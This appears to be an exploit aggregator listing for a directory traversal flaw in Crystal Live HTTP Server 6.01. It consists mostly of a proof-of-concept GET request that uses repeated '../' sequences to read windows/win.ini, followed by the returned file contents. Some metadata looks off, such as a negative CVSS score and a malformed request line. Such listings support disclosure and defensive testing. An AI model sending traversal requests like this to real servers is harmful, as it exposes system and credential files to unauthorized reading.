Exploit for Crystal Live HTTP Server 6.01 Directory Traversal

Name: Exploit for Crystal Live HTTP Server 6.01 Directory Traversal
Rating: 5 (128 reviews)

2019-11-18 | CVSS -0.3

## https://sploitus.com/exploit?id=PACKETSTORM:155370
# Title: Crystal Live HTTP Server 6.01 - Directory Traversal  
# Date of found: 2019-11-17  
# Author: Numan Türle  
# Vendor Homepage: https://www.genivia.com/  
# Version : Crystal Quality 6.01.x.x  
# Software Link : https://www.crystalrs.com/crystal-quality-introduction/  
  
  
POC  
---------  
GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1  
Host: 12.0.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
Response  
---------  
  
; for 16-bit app support  
[fonts]  
[extensions]  
[mci extensions]  
[files]  
[Mail]  
MAPI=1